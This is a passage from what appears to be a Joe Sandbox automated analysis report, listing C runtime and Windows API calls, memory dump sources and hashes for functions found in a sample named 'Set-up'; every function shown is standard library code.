                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$__crt$InfoType___crt
                                                                                              • String ID:
                                                                                              • API String ID: 3423027535-3916222277
                                                                                              • Opcode ID: f525d857bafda9b3c3383fb1f65d5ec79fc41996fca746deb42a167cd7a821e8
                                                                                              • Instruction ID: 65d76fe3d385f4a8331b42532570d587e82cd6622ce58921cec4638c49830cfd
                                                                                              • Opcode Fuzzy Hash: f525d857bafda9b3c3383fb1f65d5ec79fc41996fca746deb42a167cd7a821e8
                                                                                              • Instruction Fuzzy Hash: F44104705047DC9EDB318F648C85BEB7BF8EB05748F1444E8EA9A86182E2799B458F20
                                                                                              Function 6BB71E41 Relevance: 10.6, APIs: 7, Instructions: 123COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT(00000000,00000000,00000000,00000000,?,6BB773CA,00000000,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000,01331910), ref: 6BB71E57
                                                                                              • calloc.MSVCR100(00000001,00000002,00000000,00000000,00000000,00000000,?,6BB773CA,00000000,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000), ref: 6BB71E62
                                                                                              • wcscpy_s.MSVCR100(00000000,00000001,00000000,74DEDF80,00000000,01331910), ref: 6BB71E75
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,01331910), ref: 6BB89799
                                                                                              • _errno.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,01331910), ref: 6BB897B0
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,01331910), ref: 6BB897BA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __invoke_watson_errno_invalid_parameter_noinfo_wcslencallocwcscpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 2624155197-0
                                                                                              • Opcode ID: f465bf2f3a54c0ef8722b592f7bec246283face6e911eaf62ac90378db1aa1ce
                                                                                              • Instruction ID: 07c0e263bcf10991ecf81fcde2f808e7886a56ea4164b88877b2f71486301ca4
                                                                                              • Opcode Fuzzy Hash: f465bf2f3a54c0ef8722b592f7bec246283face6e911eaf62ac90378db1aa1ce
                                                                                              • Instruction Fuzzy Hash: F6317C3A6247D196DB212E798C8136B33B0EFC1B64B9055BAF9758B641F73DC840C390
                                                                                              Function 6BB9880C Relevance: 10.6, APIs: 7, Instructions: 87threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BB98813
                                                                                              • GetCurrentThread.KERNEL32 ref: 6BB9885E
                                                                                                • Part of subcall function 6BB9B795: _memset.LIBCMT(?,00000000,0000000C), ref: 6BB9B7A0
                                                                                                • Part of subcall function 6BB9B795: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B7A8
                                                                                                • Part of subcall function 6BB9B795: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B7B2
                                                                                                • Part of subcall function 6BB9B795: GetCurrentProcess.KERNEL32(?,?), ref: 6BB9B7C4
                                                                                                • Part of subcall function 6BB9B795: GetProcessAffinityMask.KERNEL32(00000000), ref: 6BB9B7CB
                                                                                              • _memset.LIBCMT(00000000,00000000,0000000C,?,6BBA2BA8,00000000,?,?,?,?,00000000,00000000), ref: 6BB98899
                                                                                                • Part of subcall function 6BB9B7F5: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100(?,?,6BB9899B,00000000,?,?), ref: 6BB9B7FB
                                                                                                • Part of subcall function 6BB9B7F5: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100(?,?,6BB9899B,00000000,?,?), ref: 6BB9B805
                                                                                                • Part of subcall function 6BB9B7F5: SetThreadAffinityMask.KERNEL32(?,?), ref: 6BB9B814
                                                                                                • Part of subcall function 6BBA314F: SetEvent.KERNEL32(?), ref: 6BBA3192
                                                                                              • EnterCriticalSection.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,6BB9D20F,?,00000000,00000000), ref: 6BB988C7
                                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,00000000), ref: 6BB988F3
                                                                                              • TlsGetValue.KERNEL32(?,?,00000028,6BBA297A,00000000,?,00000000,?,?,6BBA2BA8,00000000,?,?,?,?,00000000), ref: 6BB98915
                                                                                              • TlsSetValue.KERNEL32(?,00000000,?,6BBA2BA8,00000000,?,?,?,?,00000000,00000000), ref: 6BB98920
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version@$Concurrency@@Manager@1@Resource$AffinityCriticalCurrentMaskProcessSectionThreadValue_memset$EnterEventH_prolog3_Leave
                                                                                              • String ID:
                                                                                              • API String ID: 4131446515-0
                                                                                              • Opcode ID: d2bfb2c4bef7149b1db35eb9fd5e273293f1a20693287e32ee77b10d50e99b5b
                                                                                              • Instruction ID: ebf59ea28af69a892365ce6a3745bb465fcc64575b171b2da955120ff3ce2694
                                                                                              • Opcode Fuzzy Hash: d2bfb2c4bef7149b1db35eb9fd5e273293f1a20693287e32ee77b10d50e99b5b
                                                                                              • Instruction Fuzzy Hash: F8315576A00255CFCF04EF60D8C5AAE7BB5FF09314B0954A9EC05AF256DB38E941CBA1
                                                                                              Function 6BB7204F Relevance: 10.6, APIs: 7, Instructions: 82COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strnicmp_l.MSVCR100(?,74DE8406,?,?,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB720A9
                                                                                                • Part of subcall function 6BB6EFF6: _tolower_l.MSVCR100(00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F052
                                                                                                • Part of subcall function 6BB6EFF6: _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F061
                                                                                              • __crtCompareStringA.MSVCR100(?,?,00001001,?,?,74DE8406,?,00000005,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?), ref: 6BB762B7
                                                                                              • _errno.MSVCR100(00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C496
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4A1
                                                                                              • _errno.MSVCR100(7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4BC
                                                                                              • _invalid_parameter_noinfo.MSVCR100(7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4C7
                                                                                              • _errno.MSVCR100(?,?,?,?,?,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4CE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_tolower_l$CompareString__crt_strnicmp_l
                                                                                              • String ID:
                                                                                              • API String ID: 1585791229-0
                                                                                              • Opcode ID: 9b1677c3a0dbee3850117fea866f7573ad8c888ba7fc4c2c3e7d7e1ec0c9ab71
                                                                                              • Instruction ID: 767e1e74659f209225dcb58bdd63110fc14bb7cddd5752c5df8ebf7224de5d16
                                                                                              • Opcode Fuzzy Hash: 9b1677c3a0dbee3850117fea866f7573ad8c888ba7fc4c2c3e7d7e1ec0c9ab71
                                                                                              • Instruction Fuzzy Hash: 422191B19002C9AFDF21AFB4CC81ABD7775EF01324B1443A9E4345B1E0EB398991DB92
                                                                                              Function 6BB6EFF6 Relevance: 10.6, APIs: 7, Instructions: 81COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _tolower_l.MSVCR100(00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F052
                                                                                              • _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F061
                                                                                              • ___ascii_strnicmp.LIBCMT ref: 6BB77686
                                                                                              • _errno.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C408
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C413
                                                                                              • _errno.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C42F
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C43A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo_tolower_l$___ascii_strnicmp
                                                                                              • String ID:
                                                                                              • API String ID: 2390777603-0
                                                                                              • Opcode ID: 5dee6ccd69475502ea7b5f51668898b67aece249fb893b167051157f32c20104
                                                                                              • Instruction ID: d917048591e9c6fcd1c07d2092531c1e7ce88f4f850bebd61432199d74186f97
                                                                                              • Opcode Fuzzy Hash: 5dee6ccd69475502ea7b5f51668898b67aece249fb893b167051157f32c20104
                                                                                              • Instruction Fuzzy Hash: E4219C719002D99FDF21DEB8C845BBE3BA4EF412A4F2406A8A4305B1D5FB78CD45CBA1
                                                                                              Function 6BB6E5C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100 ref: 6BB89225
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB89230
                                                                                              • _errno.MSVCR100(?), ref: 6BB8923D
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?), ref: 6BB89248
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: B
                                                                                              • API String ID: 2959964966-1255198513
                                                                                              • Opcode ID: edd275210728800d1351eb05aeb73171c7f1e9d6414c99896fe65ef0e2fee524
                                                                                              • Instruction ID: 8dc3d96e63e56a5f5351839fba992b6c4b673d20857b71af5e9c6a99eea0742a
                                                                                              • Opcode Fuzzy Hash: edd275210728800d1351eb05aeb73171c7f1e9d6414c99896fe65ef0e2fee524
                                                                                              • Instruction Fuzzy Hash: 5521747280029ADFDF109FB8D8815DE7BB4FB49364F14466AE520A7280E778D9108FA5
                                                                                              Function 6BB6AEAE Relevance: 10.6, APIs: 7, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 6BB6AEB8
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6BB6AEF6
                                                                                              • _malloc_crt.MSVCR100(00000000), ref: 6BB6AF00
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 6BB6AF19
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BB6AF24
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BB6AF33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide$_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 3279498665-0
                                                                                              • Opcode ID: ea7c391440aeb0bbb985125eb44f344ce7177a9ec3326e50b03b1957db36af75
                                                                                              • Instruction ID: 15138715d884ccd037e5fda855e301688dd3805a03e433cbb5d80cef5e3e3bb9
                                                                                              • Opcode Fuzzy Hash: ea7c391440aeb0bbb985125eb44f344ce7177a9ec3326e50b03b1957db36af75
                                                                                              • Instruction Fuzzy Hash: DF118FA2902578BF8F116FB59D888AFBBBCEE467D075044A1F002D3140E6798D408AA2
                                                                                              Function 6BB98AC4 Relevance: 10.6, APIs: 7, Instructions: 65threadCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB98ACB
                                                                                                • Part of subcall function 6BB962F7: __EH_prolog3.LIBCMT ref: 6BB962FE
                                                                                                • Part of subcall function 6BB962F7: ??2@YAPAXI@Z.MSVCR100 ref: 6BB96366
                                                                                                • Part of subcall function 6BB962F7: _memset.LIBCMT(00000000,00000000,B5104C15), ref: 6BB96378
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,6BBA0AF2,?,00000001,00000010,6BBA0C38,00000000,00000000,6BBA0AF2,?,6BBA0AF2,?), ref: 6BB98AFB
                                                                                              • GetLastError.KERNEL32(?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B0B
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B23
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B31
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000001C,5D8B5351,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B43
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB98B78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@H_prolog3$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateCurrentErrorEventExceptionLastThreadThrow_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1121080609-0
                                                                                              • Opcode ID: 5c98bc4fef1d85f45f6bc91f0ac7ce659f48b93b231d121a9f54c7ad98421248
                                                                                              • Instruction ID: 8735dbf9fa1cdf75c2b52770461287820e3fec8ed7781753fea2982200e1509f
                                                                                              • Opcode Fuzzy Hash: 5c98bc4fef1d85f45f6bc91f0ac7ce659f48b93b231d121a9f54c7ad98421248
                                                                                              • Instruction Fuzzy Hash: 46216DB1900286EFC700AF7198C5A5EBBB4FF0A394B588579E118DB210D739D855DBA0
                                                                                              Function 6BB6A78A Relevance: 10.6, APIs: 7, Instructions: 63COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _get_osfhandle.MSVCR100(?,?,?,?,6BB6A865,?,6BB6A880,00000010), ref: 6BB6A795
                                                                                              • _get_osfhandle.MSVCR100(?), ref: 6BB6A7B8
                                                                                                • Part of subcall function 6BB6A745: __doserrno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB6A780
                                                                                                • Part of subcall function 6BB6A745: _errno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB90432
                                                                                                • Part of subcall function 6BB6A745: _invalid_parameter_noinfo.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB9043D
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6BB6A7BF
                                                                                              • _get_osfhandle.MSVCR100(00000002), ref: 6BB75A6F
                                                                                              • _get_osfhandle.MSVCR100(00000001,00000002), ref: 6BB75A78
                                                                                              • GetLastError.KERNEL32 ref: 6BB8F4C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 1012986785-0
                                                                                              • Opcode ID: 4c4d64862bca89c10fb235f6adaef54f2ba8e31f7d29760d9dab3eeb7b1ab5e3
                                                                                              • Instruction ID: 409ff34e5664cc14cd59a716812cd2c90fe7b710d5fc4a77f34c3d866c065b16
                                                                                              • Opcode Fuzzy Hash: 4c4d64862bca89c10fb235f6adaef54f2ba8e31f7d29760d9dab3eeb7b1ab5e3
                                                                                              • Instruction Fuzzy Hash: 261148335442F01EDA1616385889B7D36B8CF82BB4F1900A6E9398B1C0FF6DCD418A61
                                                                                              Function 6BB70338 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __doserrno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB701E4
                                                                                              • __doserrno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB902F6
                                                                                              • _errno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB902FE
                                                                                              • _errno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB90314
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB9031F
                                                                                              • _errno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB90326
                                                                                              • __doserrno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB90331
                                                                                                • Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA
                                                                                                • Part of subcall function 6BB7022F: _isatty.MSVCR100(?,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002), ref: 6BB702BE
                                                                                                • Part of subcall function 6BB7022F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE), ref: 6BB702EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __doserrno_errno$CriticalEnterFileSectionWrite_invalid_parameter_noinfo_isatty
                                                                                              • String ID:
                                                                                              • API String ID: 3635451409-0
                                                                                              • Opcode ID: 2d2487c31763a03790344f4f2e6a3b4db35a0855622db35621aff564ff91a395
                                                                                              • Instruction ID: b98127273a4be65a6f77b542d1983d0e8315d9c4216f05f32674191510fdb515
                                                                                              • Opcode Fuzzy Hash: 2d2487c31763a03790344f4f2e6a3b4db35a0855622db35621aff564ff91a395
                                                                                              • Instruction Fuzzy Hash: 5011D0718107C48FCB21AF74C88275D3760AF07329F9102A6D5349B2D0EBBE8A00CF55
                                                                                              Function 6BB71712 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __doserrno.MSVCR100(6BB717A8,00000010), ref: 6BB71424
                                                                                              • __doserrno.MSVCR100(6BB717A8,00000010), ref: 6BB90398
                                                                                              • _errno.MSVCR100(6BB717A8,00000010), ref: 6BB903A0
                                                                                              • _errno.MSVCR100(6BB717A8,00000010), ref: 6BB903B6
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB717A8,00000010), ref: 6BB903C1
                                                                                              • _errno.MSVCR100(6BB717A8,00000010), ref: 6BB903C8
                                                                                              • __doserrno.MSVCR100(6BB717A8,00000010), ref: 6BB903D3
                                                                                                • Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA
                                                                                                • Part of subcall function 6BB716B5: _get_osfhandle.MSVCR100(00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716BF
                                                                                                • Part of subcall function 6BB716B5: SetFilePointer.KERNEL32(00000000,?,00000000,6BB6D354,00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __doserrno_errno$CriticalEnterFilePointerSection_get_osfhandle_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 593789910-0
                                                                                              • Opcode ID: 64373b2add0f5f29445d02963f447dda2ff5b39e612666ca14edf3742e6be005
                                                                                              • Instruction ID: e32415fea563769372230698e668b430ebd618e5317a2e86be346531e1d93a8a
                                                                                              • Opcode Fuzzy Hash: 64373b2add0f5f29445d02963f447dda2ff5b39e612666ca14edf3742e6be005
                                                                                              • Instruction Fuzzy Hash: EE11E2718043E08FCB21AF74D882B9C37B0AF02329F690265D5305B1D1EBBD8A408F61
                                                                                              Function 6BB74544 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$NameName::
                                                                                              • String ID: throw(
                                                                                              • API String ID: 168861036-3159766648
                                                                                              • Opcode ID: 0b0f24113fdab93b5773abfe57f8926ef20ab0631efc6cc565ac2f638eb3783d
